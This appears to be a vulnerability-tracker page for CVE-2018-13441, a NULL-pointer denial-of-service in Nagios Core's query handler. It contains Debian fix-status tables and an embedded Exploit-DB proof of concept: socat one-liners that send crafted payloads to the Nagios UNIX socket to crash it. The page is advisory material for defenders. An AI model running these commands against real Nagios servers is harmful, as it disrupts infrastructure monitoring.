CVE-2018-13441

unknown
Published — · Modified —
CVSS v3
CVSS v4 NEW
not yet in upstream
VIR risk
1.0

Description

qh_help in Nagios Core version 4.4.1 and earlier is prone to a NULL pointer dereference vulnerability, which allows an attacker to cause a local denial-of-service condition by sending a crafted payload to the listening UNIX socket.

Predictions

Exploit likelihood
20%
Patch ETA

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

Mitigation details

Source: Debian Security Tracker · View original ↗ · DFSG


CVE-2018-13441

Name: CVE-2018-13441
Description: qh_help in Nagios Core version 4.4.1 and earlier is prone to a NULL pointer dereference vulnerability, which allows an attacker to cause a local denial-of-service condition by sending a crafted payload to the listening UNIX socket.
Source: CVE (at NVD; CERT, ENISA, LWN, oss-sec, fulldisc, Debian ELTS, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, GitHub advisories/code/issues, web search, more)
Debian Bugs: 917160

Vulnerable and fixed packages

The table below lists information on source packages.

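| Source Package | Release | Version | Status |
| --- | --- | --- | --- |
| nagios4 (PTS) | bookworm, bullseye | 4.4.6-4 | fixed |
| | bookworm (security) | 4.4.6-4+deb12u1 | fixed |
| | trixie | 4.4.6-4.1 | fixed |
| | trixie (security) | 4.4.6-4.1+deb13u1 | fixed |
| | sid | 4.5.12+ds-1 | fixed |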

The information below is based on the following data on fixed versions.

| Package | Type | Release | Fixed Version | Urgency | Origin | Debian Bugs |
| --- | --- | --- | --- | --- | --- | --- |
| nagios4 | source | (unstable) | 4.3.4-3 | low | | 917160 |

Notes

https://gist.github.com/fakhrizulkifli/8df4a174158df69ebd765f824bd736b8
https://github.com/NagiosEnterprises/nagioscore/commit/b1a92a3b52d292ccb601e77a0b29cb1e67ac9d76


Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-45082 dos linux text · 1 KB
Fakhri Zulkifli · 2018-07-24

Nagios Core 4.4.1 - Denial of Service

text exploit Source: Exploit-DB
# Exploit Title: Nagios Core Multiple Local Denial of Service
# Date: 2018-07-09
# Exploit Author: Fakhri Zulkifli (@d0lph1n98)
# Vendor Homepage: https://www.nagios.org/
# Software Link: https://www.nagios.org/downloads/nagios-core/
# Version: 4.4.1 and earlier
# Tested on: 4.4.1


qh_core, qh_help, and qh_echo in Nagios Core 4.4.1 and earlier are prone to a NULL pointer dereference vulnerability, which allows attackers to cause a local denial-of-service condition by sending a crafted payload to the listening UNIX socket.

1. [CVE-2018-13458] qh_core

$ echo -ne "#core\0" | socat unix-connect:./poc/nagios.qh -
$ echo -ne "@core\0" | socat unix-connect:./poc/nagios.qh -

2. [CVE-2018-13457] qh_echo

$ echo -ne "#echo\0" | socat unix-connect:./poc/nagios.qh -
$ echo -ne "@echo\0" | socat unix-connect:./poc/nagios.qh -

3. [CVE-2018-13441] qh_help

$ echo -ne "#help\0" | socat unix-connect:./poc/nagios.qh -
$ echo -ne "@help\0" | socat unix-connect:./poc/nagios.qh -

OS impact

Debian: Fixed (5 releases)

| Version | Status | Fixed in |
| --- | --- | --- |
| trixie | Fixed | 4.3.4-3 |
| sid | Fixed | 4.3.4-3 |
| forky | Fixed | 4.3.4-3 |
| bullseye | Fixed | 4.3.4-3 |
| bookworm | Fixed | 4.3.4-3 |
